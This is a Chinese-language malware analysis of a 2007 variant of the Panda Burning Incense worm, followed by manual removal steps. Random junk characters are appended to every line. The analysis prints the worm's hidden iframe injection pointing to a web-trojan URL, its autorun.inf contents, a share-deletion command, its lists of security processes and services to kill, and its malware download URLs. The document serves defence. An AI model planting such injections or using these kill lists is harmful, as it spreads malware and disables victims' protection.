熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe QURpg/<U  
QLb!e"C  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） @+Anp4%;Y  
i}~U/.P   
中文名称：（尼姆亚，熊猫烧香） ><{Lh@{  
v K!vA-7  
病毒大小：68,570 字节 }VqCyJu&{  
vY]7oX+  
编写语言：Borland Delphi 6.0 - 7.0 E2Ec
`o  
rhC x&L  
加壳方式：FSG 2.0 -> bart/xt B1va]=([)W  
J'*`K>wV  
发现时间：2007.1.16 
-NUA  
i)@H  
危害等级：高 Dj{=Y`Tw  
^F87gow%`B  
一、病毒描述： ~\u
?Nf~L  
V BjA$.  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 Iy@6cd,)S  
]f*.C9Y  
二：中毒现象： _.5ABE  
)odz/\9n3c  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 R?8/qGSVqJ  
aA-
s{af  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 R!2E`^{Wl  
S{UEV7d:n0  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 RH"EO4  
"BvDLe':  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> yAu.=Eo7  
U)D}J_Zi(  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 ML7qrc;Rx  
4x_# 1 -  
6：不能正常使用任务管理器，SREng.exe等工具。 =/bC0bb{i  

#yOn /  
7：无故的向外发包，连接局域网中其他机器。 E]ZIm  
te&p1F  
三：技术分析 Y"E*#1/  
N.-*ig.YR7  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe D3x W?$Z  
Ee'wsL  
建立注册表自启动项: I~25}(IDZ"  
+uMK_ds~  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] +g%
Ah  
R?}<CjI  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" ]%[.>mR  
`,Y/!(:;  
2：查找反病毒窗体病毒结束相关进程: 1V;,ZGI*  
1_z~<d @?;  
天网防火墙 V0y_c^x  
2Y%E.){  
virusscan Hf9F:yH  
z}2  
symantec antivirus D>K=D"  
qIk(ei  
system safety monitor A<{&?_U  
qoOq47F  
system repair engineer RNb"O{3  
wg|/-q-  
wrapped gift killer K(Ak+&[  
n(jrK9]  
游戏木马检测大师 ;%4N@Z  
Sxcp [g;  
超级巡警 k9iB-=X?4s  
t8t+wi!  
3：结束以下进程: ^Dys#
^  
d?4-"9Y  
mcshield.exe n hGh5,  
pt~b=+bBm  
vstskmgr.exe UKf0cU  
cB}6{c$_sW  
naprdmgr.exe ;a`I8Fj  
Mgg m~|9)  
updaterui.exe pxHJX2  
vp`s< ;CA  
tbmon.exe I|)U>bV  
^q/_D%]C  
scan32.exe lM[FT=M  
W.TdhJW9  
ravmond.exe P]`m5 N  
8J8@0  
ccenter.exe =Y-mc#{8  
jU=n\o=?  
ravtask.exe r*t\F&D  
nmUMg  
rav.exe QP!0I01  
,\D*=5  
ravmon.exe ~A-D>.ZH  
_rvO#h  
ravmond.exe \Wf1b8FW  
a<v!5\dq!  
ravstub.exe 4!DXj0^  
EGK7)O'W  
kvxp.kxp u51Lp  
| gP%8nh'C  
kvmonxp.kxp X&cm)o%5Fe  
'
"J``=  
kvcenter.kxp y!jq!faqt  
#>O>=#Q  
kvsrvxp.exe i3o;G"IcD  
vXeI)vFK  
kregex.exe +cC$4t0$^A  
9M1UkS$`@  
uihost.exe .@3bz  
GJn ~x  
trojdie.kxp o
/mGd~  
f"0?_cG{%  
frogagent.exe ,")/R/d  
poVtg}n  
kvxp.kxp 4>t=r\"4  
vs(x;zpJ  
kvmonxp.kxp OjfumZL#  
jT1^oXn@  
kvcenter.kxp "UTAh6[3oD  
ZA'Qw2fF0  
kvsrvxp.exe u]s}@(+.  
n_Bi HMIU'  
kregex.exe c^`(5}39v  
=;y(b~  
uihost.exe Z'o'd_g>I+  
fkJElO-F  
trojdie.kxp
4?.L+wL  
Q(h/C!rKe  
frogagent.exe ><"0GPxrx  
+/DT#}JE  
logo1_.exe }<g-0&GLm  
!MQVtn^C#  
logo_1.exe *e *V%w~75  
)9z3T>QW  
rundl132.exe pX]"^f1?O  
wv&#lM(  
taskmgr.exe 6'qu[~}Q  
2*}qQ0J  
msconfig.exe >PoVK{&y  
1$1P9x@H  
regedit.exe ^ 9FRI9
?  
f/{*v4!  
sreng.exe 6$LQO),,  
4：禁用下列服务: 6>j0geFyE2  
m!_*Q  
schedule x0$#8  
R>dd#`r"  
sharedaccess jxTYW)E   
i'`[dwfS  
rsccenter R/?ZbMn]!  
lq}g*ih  
rsravmon G2!J`}  
Or,W2  
rsccenter \cW9"e'  
TI}Y U  
kvwsc fe!{vrS  
)T!3du:M  
kvsrvxp y$U(oIU>  
s|d"2w6t  
kvwsc 9jW"83*5  
v5dLjy5
 
kvsrvxp H?tX^HO:q  
$&jte_hv  
kavsvc vnD
`+
y  
~9DD=5\  
avp p-JGDjR0G  

nV3I6  
avp >S'IrnH'!  
B`wrr8"Rz  
kavsvc Y[Eq;a132  
YK%rTbB(  
mcafeeframework V3c7F4\  
Sgq?r-Q.  
mcshield 6Eyinv  
oxXCf%!  
mctaskmanager ,f^ICM  
osZ]R  
mcafeeframework d34BJ<  
LZ<^b6Dxk  
mcshield }0~X)Vgm(  
}) Zcw1g  
mctaskmanager (
Fs{~4T  
"r[Ob]/  
navapsvc 6 U_P  
jj6yf.r6c  
wscsvc U6F1QLSLz  
6o<(,\ad[  
kpfwsvc OU'm0J
lk  
}va>jfy  
sndsrvc +l<l3uBNS  
D-4{9[  
ccproxy y7| 3]>Z  
y85R"d  
ccevtmgr JasA w7  
4Be\5Byr  
ccsetmgr FA!!S`{\  
tR(nD UHV5  
spbbcsvc 'wni.E&  
~|( eh9  
symantec core lc qylI/
,y{  
\gR%PN  
npfmntor Ticx]_+~T  
>)+N$EN  
mskservice y_r(06"z1  
\IZY\WU}2  
firesvc d r$E:kr  
pT/z`o$#V  
5：删除下列注册表项: .?kq\.rQ  
:B:6ezDF6  
software\microsoft\windows\currentversion\run\ravtask 2]=`^r
C*  
(nAL;:$x2  
software\microsoft\windows\currentversion\run\kvmonxp EO%"[k  
nXw98;  
software\microsoft\windows\currentversion\run\kav 8]Q#P  
i!EAs`$o`  
software\microsoft\windows\currentversion\run\kavpersonal50 tE,& G-jU  
8kT`5`}lB  
software\microsoft\windows\currentversion\run\mcafeeupdaterui b_^y Ke^W  
UCJx{7  
software\microsoft\windows\currentversion\run\network associates error reporting service oI-,6G}
 
33g$mUB  
software\microsoft\windows\currentversion\run\shstatexe &O#,"u/q`  
BhhFij
4  
software\microsoft\windows\currentversion\run\ylive.exe yMXf&$C  
[Qcht,\^v  
software\microsoft\windows\currentversion\run\yassistse :0Z\-7iK  
< n/ 2  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） </2 aQn  
e~7FK_y#0  
7：跳过下列目录: et?FX K"y  
Xw3j(`w$,  
windows .3&(Y  
d/!\iLF
  
winnt ,Oe:SZJ>  
inh J|pe"  
systemvolumeinformation +lxjuEiae  
tAsap}(  
recycled Jj?HOtaM  
M.+h3<%^  
windowsnt G.`
},c;A-  
p6!5}dD(  
windowsupdate `aTw!QBf
G  
x#gZC
1$Y  
windowsmediaplayer w!'y,yb%  
Q[?R{w6  
outlookexpress !o1IpTN  
4:-x!lt  
netmeeting RLZfXXMn  
|Z)}-'QUJ  
commonfiles
3?&v:H  
`][vaLd`Q  
complusapplications ;wkMa;%`g|  
H]7bqr  
commonfiles YgdQC(ib  
]6M,s0  
messenger c g)>A  
==Xy'n9'  
installshieldinstallationinformation JOJuGB-d  
3dlY_z=0  
msn M\-[C!h,  
.]s? 01Z  
microsoftfrontpage ZZ  Hjv  
-+Ot'^  
moviemaker uVKe?~RC  
k%X $@NP  
msngaminzone A*~G[KC3(  
"{\xBX~oM  
8：删除*.gho备份文件. 4hc[rN,]  
y0`; br\X  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. FvY=!U06  
dNhbvzl(  
autorun.inf内容： NyT%S?@y<  
~M8|r!_  
程序代码 /_})7I52  
PpKjjA<  
[AutoRun] 0G6aF
"  
]E$NJq|  
OPEN=setup.exe !+A%`m  
(WJ)!  
shellexecute=setup.exe ?_d6;  
T.3{}230<  
shell\Auto\command=setup.exe rhcax%
Cd  
VnVBA-#r|  
10：删除共享：cmd.exe /c net share admin$ /del /y ]XbMqHGS  
r5N TTc  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 ?&;_>0P  
}6!/Nb  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 >mX6;6FF  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 '?| 1\j  
|=*)a2  
目前下载列表如下： KILX?Pt[7  
f)j*P<V  
http://www.krvkr.com/down/cq.exe %~PcJhz  
>5#}/G&  
http://www.krvkr.com/down/mh.exe ~abyjM  
:CW^$Zvq  
http://www.krvkr.com/down/my.exe ^!\AT!
OT  
E I(e3  
http://www.krvkr.com/down/wl.exe l=p_  
JJ7A` ;  
http://www.krvkr.com/down/rx.exe \Q(a`6U  
"A"YgD#t  
http://www.krvkr.com/down/wow.exe \? )S{  
n|)((W  
http://www.krvkr.com/down/zt.exe JR#4{P@A  
J)Y`G4l2@  
http://www.krvkr.com/down/wm.exe Jh0Grq  
G(.G>8pf  
http://www.krvkr.com/down/dj.exe babL.Ua8o  
%L*EB;nK  
http://www.krvkr.com/cn/iechajian.exe E&zf<Y  
CTW\Dt5
 
到此病毒行为分析完毕。 05R"/r*  
yy=hCjQ)  
四：Sec120.Com专家解决方案： S xJ&5q  
:>{!%-1Z  
1：关闭网络共享，断开网络。 HzGwO^tbK  
=Q40]>bpx  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） &{.IUg  
BP@tI|  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 ` = O  
=yZq]g6Q  
4：删除注册表启动项 Bh2l3J4X  
x)Bbo9J  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] 0>Snps3*Z  
8#yu.\N.xt  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" '~&W'='b;  
&L$9Ii  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe m%`YAD@2z  
]"Uzn  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 qIQ=OY=6  
{73V?#P4  
7：如果电脑上有脚本文件，将病毒代码全部删除。 H]R/=OYBUh  
bpwA|H%{M  
8：关闭系统的自动播放功能。 K 77iv  
NplyvjQN;  
这样就基本上将病毒清除了